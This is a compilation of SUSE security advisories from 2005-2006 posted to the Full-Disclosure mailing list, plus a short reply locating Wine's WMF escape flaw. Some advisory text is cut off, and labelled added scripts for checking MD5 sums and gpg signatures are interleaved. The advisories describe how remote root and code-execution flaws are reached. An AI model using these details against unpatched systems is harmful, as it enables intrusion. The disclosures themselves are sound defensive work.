   SUSE LINUX 9.1:
   ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/gpg-1.2.4-68.10.i586.rpm
  5ea37344f72e28ff06f40976081e6499
   ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/liby2util-2.9.27-0.7.i586.rpm
  dcdaf21f345b2d4ffa55a78c74625633
   ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/liby2util-devel-2.9.27-0.7.i586.rpm
  18624f647f80b9e39a8c910c90d60c87

   Power PC Platform:

   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/liby2util-2.12.9-0.4.ppc.rpm
  584b0cc0fadc160148b98976cbb9abb8
   

[Full-disclosure] SUSE Security Announcement: CASA remote code execution (SUSE-SA:2006:010)

2006-02-22 Thread Marcus Meissner

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

__

SUSE Security Announcement

Package:CASA
Announcement ID:SUSE-SA:2006:010
Date:   Wed, 22 Feb 2006 12:00:00 +
Affected Products:  Novell Linux Desktop 9
Open Enterprise Server 1
Vulnerability Type: remote code execution
Severity (1-10):10
SUSE Default Package:   yes
Cross-References:   CVE-2006-0736

Content of This Advisory:
1) Security Vulnerability Resolved:
 remote root exploit in CASA PAM handler
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   This update fixes a remotely exploitable stack buffer overflow in
   the pam_micasa authentication module.

   Since this module is added to /etc/pam.d/sshd automatically on
   installation of CASA it was possible for remote attackers to gain
   root access to any machine with CASA installed.

   This is tracked by the Mitre CVE ID CVE-2006-0736.

2) Solution or Work-Around

   Upgrade to the fixed packages.

   You can also deinstall CASA by doing:
 rpm -e CASA CASA-gui CASA-devel

3) Special Instructions and Notes

   None.

4) Package Location and Checksums

   The preferred method for installing security updates on Novell Linux
   Desktop 9 and Open Enterprise Server 1 is to use the Redcarpet
   frontends, either via the GUI interface or the rug commandline
   frontend.

   The packages are also offered for installation from the maintenance web:

   http://support.novell.com/cgi-bin/search/searchtid.cgi?psdb/eb79800a3d8a5cb6599b75e30f0ba133.html

__

5) Pending Vulnerabilities, Solutions, and Work-Arounds:

   See SUSE Security Summary Report.
__

6) Authenticity Verification and Additional Information

  - Announcement authenticity verification:

SUSE security announcements are published via mailing lists and on Web
sites. The authenticity and integrity of a SUSE security announcement is
guaranteed by a cryptographic signature in each announcement. All SUSE
security announcements are published with a valid signature.

To verify the signature of the announcement, save it as text into a file
and run the command

  gpg --verify file

replacing file with the name of the file where you saved the
announcement. The output for a valid signature looks like:

  gpg: Signature made DATE using RSA key ID 3D25D3D9
  gpg: Good signature from SuSE Security Team [EMAIL PROTECTED]

where DATE is replaced by the date the document was signed.

If the security team's key is not contained in your key ring, you can
import it from the first installation CD. To import the key, use the
command

  gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc

  - Package authenticity verification:

SUSE update packages are available on many mirror FTP servers all over the
world. While this service is considered valuable and important to the free
and open source software community, the authenticity and the integrity of
a package needs to be verified to ensure that it has not been tampered
with.

There are two verification methods that can be used independently from
each other to prove the authenticity of a downloaded file or RPM package:

1) Using the internal gpg signatures of the rpm package
2) MD5 checksums as provided in this announcement

1) The internal rpm package signatures provide an easy way to verify the
   authenticity of an RPM package. Use the command

rpm -v --checksig file.rpm

   to verify the signature of the package, replacing file.rpm with the
   filename of the RPM package downloaded. The package is unmodified if it
   contains a valid signature from [EMAIL PROTECTED] with the key ID 9C800ACA.

   This key is automatically imported into the RPM database (on
   RPMv4-based distributions) and the gpg key ring of 'root' during
   installation. You can also find it on the first installation CD and at
   the end of this announcement.

2) If you need an alternative means of verification, use the md5sum
   command to verify the authenticity of the packages. Execute the command

 md5sum filename.rpm

   after you downloaded the file 

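Section 6 of the announcements above lists two independent package checks: the rpm-internal gpg signature (rpm -v --checksig) and the MD5 sums printed under each URL in section 4. As an added example, not SUSE's tooling, the following Python parses that URL-then-hash listing format into a manifest and compares every downloaded file against it, reporting ok, mismatch or missing. The listing and the package files are constructed inline (placeholder bytes, not real RPMs), with the listing's hashes derived from them so that the intact file passes. Two caveats a practitioner should keep in mind: MD5 is no longer collision-resistant, so this catches corruption and casual tampering but is not a substitute for the rpm signature check; and a hash list copied from a mirror or web page proves nothing unless the announcement's own gpg signature was verified first.

```python
"""Added example (not SUSE tooling): verify downloaded packages against an
advisory-style URL/MD5 listing. Listing text and package files are
constructed here; the hashes in the listing are derived from those bytes."""
import hashlib
import os
import re
import tempfile

# One entry in section 4 of the announcements: a URL ending in .rpm, then
# (after a line break and indentation) a 32-hex-digit MD5 sum.
ENTRY_RE = re.compile(r"(ftp://\S+?\.rpm)\s+([0-9a-fA-F]{32})")


def parse_listing(text):
    """Map package file name -> expected MD5 (lower-case hex) from advisory text."""
    manifest = {}
    for url, digest in ENTRY_RE.findall(text):
        manifest[url.rsplit("/", 1)[1]] = digest.lower()
    return manifest


def md5_file(path, chunk=1 << 16):
    """Stream the file through MD5 so large RPMs are not read into memory at once."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def verify_downloads(manifest, directory):
    """Return {file name: 'ok' | 'mismatch' | 'missing'} for every manifest entry."""
    results = {}
    for name, expected in manifest.items():
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            results[name] = "missing"
        elif md5_file(path) == expected:
            results[name] = "ok"
        else:
            results[name] = "mismatch"
    return results


# Constructed package contents; the listing below is built from their hashes.
GOOD_RPM = b"placeholder rpm payload A"
TAMPERED_RPM = b"placeholder rpm payload B"
SAMPLE_LISTING = (
    "   SUSE LINUX 10.0:\n"
    "   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/good-1.0-1.i586.rpm\n"
    f"  {hashlib.md5(GOOD_RPM).hexdigest()}\n"
    "   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/tampered-1.0-1.i586.rpm\n"
    f"  {hashlib.md5(TAMPERED_RPM).hexdigest()}\n"
    "   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/missing-1.0-1.i586.rpm\n"
    "  0123456789abcdef0123456789abcdef\n"
)


def demo():
    """Write the intact file, a modified copy of the second, and skip the third."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "good-1.0-1.i586.rpm"), "wb") as f:
            f.write(GOOD_RPM)
        with open(os.path.join(d, "tampered-1.0-1.i586.rpm"), "wb") as f:
            f.write(TAMPERED_RPM + b"\x00")   # one extra byte: the MD5 no longer matches
        return verify_downloads(parse_listing(SAMPLE_LISTING), d)


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{status:8s} {name}")
```

To use it on a real announcement, paste section 4 into parse_listing() after verifying the announcement's signature with gpg --verify, and point verify_downloads() at the download directory; anything other than ok for a package means it must not be installed.
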
[Full-disclosure] SUSE Security Announcement: gpg, liby2util signature checking problems (SUSE-SA:2006:009)

2006-02-20 Thread Marcus Meissner

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

__

SUSE Security Announcement

Package:gpg,liby2util
Announcement ID:SUSE-SA:2006:009
Date:   Mon, 20 Feb 2006 18:00:00 +
Affected Products:  SUSE LINUX 10.0
SUSE LINUX 9.3
Vulnerability Type: remote code execution
Severity (1-10):9
SUSE Default Package:   yes
Cross-References:   CVE-2006-0455

Content of This Advisory:
1) Security Vulnerability Resolved:
 gpg incorrect signature checking
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   With certain handcraftable signatures GPG was returning a 0 (valid
   signature) when used on command-line with option --verify.

   This only affects GPG version 1.4.x, so it only affects SUSE Linux
   9.3 and 10.0.  Other SUSE Linux versions are not affected.

   This could make automated checkers, like for instance the patch file
   verification checker of the YaST Online Update, pass malicious patch
   files as correct.

   This is tracked by the Mitre CVE ID CVE-2006-0455.

   Also, the YaST Online Update script signature verification had used
   a feature which was lost in gpg 1.4.x, making it possible to
   supply any kind of script which would be thought correct. This would
   also allow code execution.

   Both attacks require an attacker either manipulating a YaST Online
   Update mirror or manipulating the network traffic between the mirror
   and your machine.

2) Solution or Work-Around

   There is no known workaround, please install the update packages.

3) Special Instructions and Notes

   None.

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

 rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the filename of the
   downloaded RPM package.


   x86 Platform:

   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/gpg-1.4.2-5.2.i586.rpm
  f1422c0264ff3e270a56d03d4b47e762
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/liby2util-2.12.9-0.3.i586.rpm
  9a6f3ee339303f3efd92121dedf441aa
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/liby2util-devel-2.12.9-0.3.i586.rpm
  b504c0cf0f84039018ae1ac90d2e5292

   SUSE LINUX 9.3:
   ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/gpg-1.4.0-4.2.i586.rpm
  fffa34f3034effa188cbeb942473e200
   
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/liby2util-2.11.7-0.3.i586.rpm
  a321ab146d07c50cc69a91352ac28bf7
   
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/liby2util-devel-2.11.7-0.3.i586.rpm
  1215bcf8f061079dbe05b93b1d611818

   Power PC Platform:

   SUSE LINUX 10.0:
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/liby2util-2.12.9-0.3.ppc.rpm
  287ef59b3aec2b9aaaba0e17a9cbba27
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/liby2util-devel-2.12.9-0.3.ppc.rpm
  f0bd4524c50c5e0a5613f70393ba4489

   x86-64 Platform:

   SUSE LINUX 10.0:
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/x86_64/liby2util-2.12.9-0.3.x86_64.rpm
  edcad55c6587b9322b5895f2e1ff3760
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/x86_64/liby2util-devel-2.12.9-0.3.x86_64.rpm
  c6b4a827e8ab4dc6d14608ceeb3e3385

   SUSE LINUX 9.3:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/liby2util-2.11.7-0.3.x86_64.rpm
  7cd1425a429b4637b34aa675d4eeaa85
   
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/liby2util-devel-2.11.7-0.3.x86_64.rpm
  8d27157261b70a5bb51ab643d8dd1fe8

   Sources:

   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/src/gpg-1.4.2-5.2.src.rpm
  5098f06cba2e38aa0b5181fb3f9cd7f3
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/src/liby2util-2.12.9-0.3.src.rpm
  3107fb78311f00f01c484c1fa1ab26df

   SUSE LINUX 9.3:
   ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/gpg-1.4.0-4.2.src.rpm
  026b7d74d345815de958152305ffde09
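The problem description above concerns automated checkers that trusted the exit status of `gpg --verify`. As an added example, not part of the SUSE announcement, the POSIX shell function below judges a verification run by gpg's machine-readable `--status-fd` lines instead: it requires both a GOODSIG and a VALIDSIG line, requires the VALIDSIG fingerprint to equal a pinned key fingerprint, and fails if any BADSIG, ERRSIG, NODATA, EXPKEYSIG or REVKEYSIG line appears. The fingerprint, user ID and status lines embedded for the demonstration are constructed placeholders, not real SUSE key material.

```shell
#!/bin/sh
# Added example, not part of the SUSE advisory: judge a gpg --verify run by
# its --status-fd lines instead of its exit code alone.
#
# Real use:  gpg --status-fd 1 --verify file 2>/dev/null | gpg_status_ok FPR
# FPR is the 40-hex-digit fingerprint of the key the signature must come from.
# Returns 0 only if a GOODSIG line and a VALIDSIG line carrying FPR were
# reported and no BADSIG/ERRSIG/NODATA/EXPKEYSIG/REVKEYSIG line appeared.
gpg_status_ok() {
    expected=$1
    goodsig=0 validsig=0 bad=0
    while IFS= read -r line; do
        case "$line" in
            "[GNUPG:] GOODSIG "*)
                goodsig=1 ;;
            "[GNUPG:] VALIDSIG "*)
                # the first field after the keyword is the signing key fingerprint
                rest=${line#"[GNUPG:] VALIDSIG "}
                fpr=${rest%% *}
                [ "$fpr" = "$expected" ] && validsig=1 ;;
            "[GNUPG:] BADSIG "*|"[GNUPG:] ERRSIG "*|"[GNUPG:] NODATA "*|"[GNUPG:] EXPKEYSIG "*|"[GNUPG:] REVKEYSIG "*)
                bad=1 ;;
        esac
    done
    [ "$goodsig" -eq 1 ] && [ "$validsig" -eq 1 ] && [ "$bad" -eq 0 ]
}

# Constructed sample of what gpg --status-fd prints for a good signature.
# The fingerprint and user ID are placeholders, not a real SUSE key.
SAMPLE_FPR=0123456789ABCDEF0123456789ABCDEF01234567
sample_status() {
    printf '%s\n' \
        "[GNUPG:] NEWSIG" \
        "[GNUPG:] GOODSIG 89ABCDEF01234567 Example Security Team <security@example.org>" \
        "[GNUPG:] VALIDSIG $SAMPLE_FPR 2006-02-15 1139990400 0 4 0 1 2 00 $SAMPLE_FPR"
}

# Demo when run directly: accepted for the pinned key, rejected for another.
sample_status | gpg_status_ok "$SAMPLE_FPR" && echo "sample: accepted for pinned key"
sample_status | gpg_status_ok FEDCBA9876543210FEDCBA9876543210FEDCBA98 || echo "sample: rejected for other key"
```

Pinning the fingerprint matters because GOODSIG alone only says that some key in the local keyring produced a valid signature; VALIDSIG names which one.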
   

[Full-disclosure] SUSE Security Announcement: nfs-server/rpc.mountd remote code execution (SUSE-SA:2006:005)

2006-01-26 Thread Marcus Meissner

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

__

SUSE Security Announcement

Package:nfs-server
Announcement ID:SUSE-SA:2006:005
Date:   Thu, 26 Jan 2006 14:00:00 +
Affected Products:  SUSE LINUX 10.0
SUSE LINUX 9.3
SUSE LINUX 9.2
SUSE LINUX 9.1
Vulnerability Type: remote code execution
Severity (1-10):7
SUSE Default Package:   no
Cross-References:   CVE-2006-0043

Content of This Advisory:
1) Security Vulnerability Resolved:
 remote code execution in rpc.mountd of nfs-server
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   A remotely exploitable problem exists in the rpc.mountd service in
   the user space NFS server package nfs-server.

   Insufficient buffer space supplied to the realpath() function
   when processing mount requests can lead to a buffer overflow in
   rpc.mountd and allows remote attackers to execute code as the
   root user.

   Code execution is definitely possible if the attacker can create
   symlinks on any of the file systems on the machine running rpc.mountd
   (/tmp, /home/attacker or similar).
   For attackers without filesystem access, code execution is potentially
   possible.

   NOTE:
   The nfs-server package is obsolete and has been replaced by the
   nfs-utils package (kernel NFS server) in all currently supported
   SUSE Linux products already and is only included for completeness.
   The nfs-utils package itself is NOT affected by this problem.

   This issue is tracked by the Mitre CVE ID CVE-2006-0043.

2) Solution or Work-Around

   If you are still using the old user space nfs-server package, consider
   switching to the kernel level nfs-utils package which is not affected
   by this problem.

   If you are not using NFS serving at all, deinstall the RPM.

   Otherwise install the updated packages.

3) Special Instructions and Notes

   None.

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

 rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the filename of the
   downloaded RPM package.


   x86 Platform:

   SUSE LINUX 10.0:
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/nfs-server-2.2beta51-212.2.i586.rpm
  5e37fe16b2c59ecd4f5296ab63710080

   SUSE LINUX 9.3:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/nfs-server-2.2beta51-209.2.i586.rpm
  12d423a4df41149131c184ba98cd139f

   SUSE LINUX 9.2:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/nfs-server-2.2beta51-208.2.i586.rpm
  4df2803717ec4404204f2550c3aa8240

   SUSE LINUX 9.1:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/nfs-server-2.2beta51-206.4.i586.rpm
  0e4b9814cfc427d708ed664fcb2d5e83

   Power PC Platform:

   SUSE LINUX 10.0:
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/nfs-server-2.2beta51-212.2.ppc.rpm
  e64aa29d0b1cdbf8c7801592df9bf199

   x86-64 Platform:

   SUSE LINUX 10.0:
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/x86_64/nfs-server-2.2beta51-212.2.x86_64.rpm
  961bef35240193e56c5f3bf6828611c8

   SUSE LINUX 9.3:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/nfs-server-2.2beta51-209.2.x86_64.rpm
  8cacbd583e70f204897f5f4449f4dedd

   SUSE LINUX 9.2:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/nfs-server-2.2beta51-208.2.x86_64.rpm
  24a0186b5f57fadd1fb7753e416d3d2a

   SUSE LINUX 9.1:
   
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/nfs-server-2.2beta51-206.4.x86_64.rpm
  33b5dddc7a9e717fa229661efa9592d5

   Sources:

   SUSE LINUX 10.0:
   
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/src/nfs-server-2.2beta51-212.2.src.rpm
  2fc9d81e214d444cb305f8a485930a48

   SUSE LINUX 9.3:
   
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/nfs-server-2.2beta51-209.2.src.rpm
  3d21171dda052e1e744d08ba7dd39742

   SUSE LINUX 9.2:
  

[Full-disclosure] SUSE Security Announcement: novell-nrm remote heap overflow (SUSE-SA:2006:002)

2006-01-13 Thread Marcus Meissner

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

__

SUSE Security Announcement

Package:novell-nrm
Announcement ID:SUSE-SA:2006:002
Date:   Fri, 13 Jan 2006 15:00:00 +
Affected Products:  Open Enterprise Server
Vulnerability Type: remote code execution
Severity (1-10):10
SUSE Default Package:   yes
Cross-References:   CVE-2005-3655

Content of This Advisory:
1) Security Vulnerability Resolved:
 remote heap overflow 
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   iDEFENSE reported a security problem with the Novell Remote Manager.

   By passing a huge or negative size via an HTTP request header to
   httpstkd it was possible to corrupt heap memory and so potentially
   execute code.

   We have released updated packages for this problem.

   The affected novell-nrm package is only included in the Open Enterprise
   Server.

   This issue is tracked by the Mitre CVE ID CVE-2005-3655.

2) Solution or Work-Around

   There is no known workaround, please install the update packages.

3) Special Instructions and Notes

   None

4) Package Location and Checksums

   The preferred method for installing security updates on Open Enterprise
   Server is Red Carpet / ZLM.

   The packages are also offered for installation from the maintenance web:
   
   
http://support.novell.com/cgi-bin/search/searchtid.cgi?psdb/1af470a99a736eb966cc0e52fb71ee98.html
   http://portal.suse.com/psdb/1af470a99a736eb966cc0e52fb71ee98.html

__

5) Pending Vulnerabilities, Solutions, and Work-Arounds:

   See SUSE Security Summary Report.
__

6) Authenticity Verification and Additional Information

  - Announcement authenticity verification:

SUSE security announcements are published via mailing lists and on Web
sites. The authenticity and integrity of a SUSE security announcement is
guaranteed by a cryptographic signature in each announcement. All SUSE
security announcements are published with a valid signature.

To verify the signature of the announcement, save it as text into a file
and run the command

  gpg --verify file

replacing file with the name of the file where you saved the
announcement. The output for a valid signature looks like:

  gpg: Signature made DATE using RSA key ID 3D25D3D9
  gpg: Good signature from SuSE Security Team [EMAIL PROTECTED]

where DATE is replaced by the date the document was signed.

If the security team's key is not contained in your key ring, you can
import it from the first installation CD. To import the key, use the
command

  gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc

  - Package authenticity verification:

SUSE update packages are available on many mirror FTP servers all over the
world. While this service is considered valuable and important to the free
and open source software community, the authenticity and the integrity of
a package needs to be verified to ensure that it has not been tampered
with.

There are two verification methods that can be used independently from
each other to prove the authenticity of a downloaded file or RPM package:

1) Using the internal gpg signatures of the rpm package
2) MD5 checksums as provided in this announcement

1) The internal rpm package signatures provide an easy way to verify the
   authenticity of an RPM package. Use the command

rpm -v --checksig file.rpm

   to verify the signature of the package, replacing file.rpm with the
   filename of the RPM package downloaded. The package is unmodified if it
   contains a valid signature from [EMAIL PROTECTED] with the key ID 9C800ACA.

   This key is automatically imported into the RPM database (on
   RPMv4-based distributions) and the gpg key ring of 'root' during
   installation. You can also find it on the first installation CD and at
   the end of this announcement.

2) If you need an alternative means of verification, use the md5sum
   command to verify the authenticity of the packages. Execute the command

 md5sum filename.rpm

   after you downloaded the file from a SUSE FTP server or its mirrors.
   Then compare the resulting md5sum 
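Section 4 of these announcements lists each package as a URL line followed by its MD5 checksum, and section 6 above describes comparing that value with the output of md5sum. As an added example, not part of the SUSE announcement, the POSIX shell script below automates the comparison: it reads an advisory-style list saved to a file (URL line, then a 32-hex-digit line) and checks every package of that name in a download directory, printing OK, FAIL or MISSING per package and returning non-zero if anything is off. The list file, download directory and package contents it builds for the demonstration are constructed placeholders; `rpm -v --checksig` from section 6 is the stronger check and is not replaced by this.

```shell
#!/bin/sh
# Added example, not part of the SUSE advisory: check downloaded update
# packages against the "URL / md5sum" pairs of an advisory's section 4.
# Assumes GNU coreutils md5sum and grep -E. All paths below are placeholders.

# md5_of FILE: print the hex MD5 digest of FILE.
md5_of() {
    md5sum "$1" | cut -d' ' -f1
}

# verify_list LISTFILE DIR: LISTFILE holds lines copied from the advisory,
# i.e. a package URL followed (after optional blank lines) by its checksum.
# Each URL's basename is looked up in DIR and compared. One line per package
# is printed (OK/FAIL/MISSING); the return code is 0 only if every listed
# package was found and matched.
verify_list() {
    list=$1
    dir=$2
    url=''
    status=0
    # plain read (default IFS) trims the advisory's indentation
    while read -r line; do
        case "$line" in
            ftp://*|http://*|https://*)
                url=$line
                ;;
            *)
                if [ -n "$url" ] && printf '%s\n' "$line" | grep -Eq '^[0-9a-f]{32}$'; then
                    name=${url##*/}
                    if [ ! -f "$dir/$name" ]; then
                        echo "MISSING $name"
                        status=1
                    elif [ "$(md5_of "$dir/$name")" = "$line" ]; then
                        echo "OK      $name"
                    else
                        echo "FAIL    $name"
                        status=1
                    fi
                    url=''
                fi
                ;;
        esac
    done < "$list"
    return $status
}

# make_sample DIR: build a constructed download directory and list file under
# DIR (names and contents are made up; one checksum is deliberately wrong and
# one listed package is absent). Prints the list file's path.
make_sample() {
    d=$1
    mkdir -p "$d/dl"
    printf 'good package payload\n' > "$d/dl/good-1.0-1.i586.rpm"
    printf 'tampered payload\n'     > "$d/dl/bad-1.0-1.i586.rpm"
    good_sum=$(md5_of "$d/dl/good-1.0-1.i586.rpm")
    cat > "$d/list.txt" <<EOF
   ftp://ftp.example.org/update/rpm/i586/good-1.0-1.i586.rpm
  $good_sum
   
ftp://ftp.example.org/update/rpm/i586/bad-1.0-1.i586.rpm
  00000000000000000000000000000000
   ftp://ftp.example.org/update/rpm/i586/absent-1.0-1.i586.rpm
  ffffffffffffffffffffffffffffffff
EOF
    echo "$d/list.txt"
}

# Demo when run directly.
tmp=$(mktemp -d)
verify_list "$(make_sample "$tmp")" "$tmp/dl" || echo "verification failed: do not install"
rm -rf "$tmp"
```

A FAIL or MISSING result means the download should be discarded rather than installed with rpm -Fhv; a mirror serving a package whose checksum differs from the signed announcement is exactly the case the section 6 checks exist for.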

Re: [Full-disclosure] Microsoft patches WMF... Wine is still exploitable?

2006-01-05 Thread Marcus Meissner
On Thu, Jan 05, 2006 at 03:15:28PM -0600, H D Moore wrote:
 ---
 wine-20050930/dlls/gdi/driver.c
 ---

You have all the wrong places, this is all valid functionality.

You want this place:

dlls/gdi/metafile.c::PlayMetaFileRecord
...
case META_ESCAPE:
Escape(hdc, mr->rdParm[0], mr->rdParm[1], (LPCSTR)mr->rdParm[2], NULL);
break;
...

This call should use a whitelist of the valid GDI Escapes in metafiles.

Ciao, Marcus
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] SUSE Security Announcement: kernel various security and bugfixes (SUSE-SA:2005:068)

2005-12-14 Thread Marcus Meissner

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

__

SUSE Security Announcement

Package:kernel
Announcement ID:SUSE-SA:2005:068
Date:   Wed, 14 Dec 2005 16:00:00 +
Affected Products:  SUSE LINUX 9.3
SUSE LINUX 9.2
SUSE LINUX 9.1
SuSE Linux 9.0
SuSE Linux Desktop 1.0
SuSE Linux Enterprise Server 8
SUSE Linux Enterprise Server 9
UnitedLinux 1.0
Vulnerability Type: denial of service
Severity (1-10):6
SUSE Default Package:   yes
Cross-References:   CVE-2005-1041, CVE-2005-2457, CVE-2005-2458
CVE-2005-2459, CVE-2005-2490, CVE-2005-2492
CVE-2005-2800, CVE-2005-2872, CVE-2005-2973
CVE-2005-3044, CVE-2005-3055, CVE-2005-3110
CVE-2005-3180, CVE-2005-3275, CVE-2005-3527
CVE-2005-3783, CVE-2005-3784, CVE-2005-3805
CVE-2005-3806, CVE-2005-3807

Content of This Advisory:
1) Security Vulnerability Resolved:
 Linux kernel security problems and bugfixes
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   The Linux kernel was updated to fix several security problems and
   several bugs, listed below:

   Security fixes:
   - CVE-2005-3783: A check in ptrace(2) handling that finds out if
 a process is attaching to itself was incorrect and could be used
 by a local attacker to crash the machine. (All)

   - CVE-2005-3784: A check in reaping of terminating child processes did
 not consider ptrace(2) attached processes and would leave a ptrace
 reference dangling. This could lead to a local user being able to
 crash the machine. (Linux kernel 2.6 based products only)

   - CVE-2005-2973: An infinite loop in the IPv6 UDP loopback handling
 can be easily triggered by a local user and lead to a denial
 of service.  (Linux kernel 2.6 based products only)

   - CVE-2005-3055: Unplugging a user space controlled USB device with
 a URB pending in user space could crash the kernel. This can be
 easily triggered by a local attacker. (Fixed for Linux kernel 2.6
 based products only.)

   - CVE-2005-3044: Missing sockfd_put() calls in routing_ioctl() leaked
 file handles which in turn could exhaust system memory. (All)

   - CVE-2005-3180: Fixed incorrect padding in Orinoco wireless driver,
 which could expose kernel data to the air. (Linux 2.6 based
 products only)

   - CVE-2005-2490: A stack-based buffer overflow in the sendmsg function
 call in the Linux kernel 2.6 and 2.4 allowed local users to execute
 arbitrary code by calling sendmsg and modifying the message contents
 in another thread. (All)

   - CVE-2005-3806: A bug in IPv6 flow label handling code could be used
 by a local attacker to free non-allocated memory and in turn corrupt
 kernel memory and likely crash the machine. (All)

   - CVE-2005-3275: The NAT code in Linux kernel incorrectly declares
 a variable to be static, which allows remote attackers to cause a
 denial of service (memory corruption) by causing two packets for
 the same protocol to be NATed at the same time. (All)

   - CVE-2005-2457: A problem in decompression of files on zisofs
 filesystem was fixed. (All)

   - CVE-2005-2458: A potential buffer overflow in the zlib decompression
 handling in the kernel was fixed. (All)

   - CVE-2005-2459: Some return codes in zlib decoding were fixed which
 could have led to an attacker crashing the kernel. (All)

   - CVE-2005-3110: A race condition in the ebtables netfilter module
 (ebtables.c), when running on an SMP system that is operating under a
 heavy load, might allow remote attackers to cause a denial of service
 (crash) via a series of packets that cause a value to be modified
 after it has been read but before it has been locked. (Linux kernel
 2.6 based products only)

   - CVE-2005-1041: A race condition when reading the /proc/net/route
 virtual file could be used by a local attacker to potentially crash
 the machine.  (Linux kernel 2.6 based products only)

   - CVE-2005-2800: A memory 

[Full-disclosure] SUSE Security Announcement: openSSL protocol downgrade attack (SUSE-SA:2005:061)

2005-10-19 Thread Marcus Meissner

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

__

SUSE Security Announcement

Package:openssl
Announcement ID:SUSE-SA:2005:061
Date:   Wed, 19 Oct 2005 12:00:00 +
Affected Products:  SUSE LINUX 10.0
SuSE Linux 9.0
SUSE LINUX 9.1
SUSE LINUX 9.2
SUSE LINUX 9.3
SuSE Linux Desktop 1.0
SuSE Linux Enterprise Server 8
SUSE Linux Enterprise Server 9
UnitedLinux 1.0
Novell Linux Desktop 9
Open Enterprise Server
Vulnerability Type: protocol downgrade attack
Severity (1-10):7
SUSE Default Package:   yes
Cross-References:   CAN-2005-2969

Content of This Advisory:
1) Security Vulnerability Resolved:
 openssl protocol downgrading attack
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

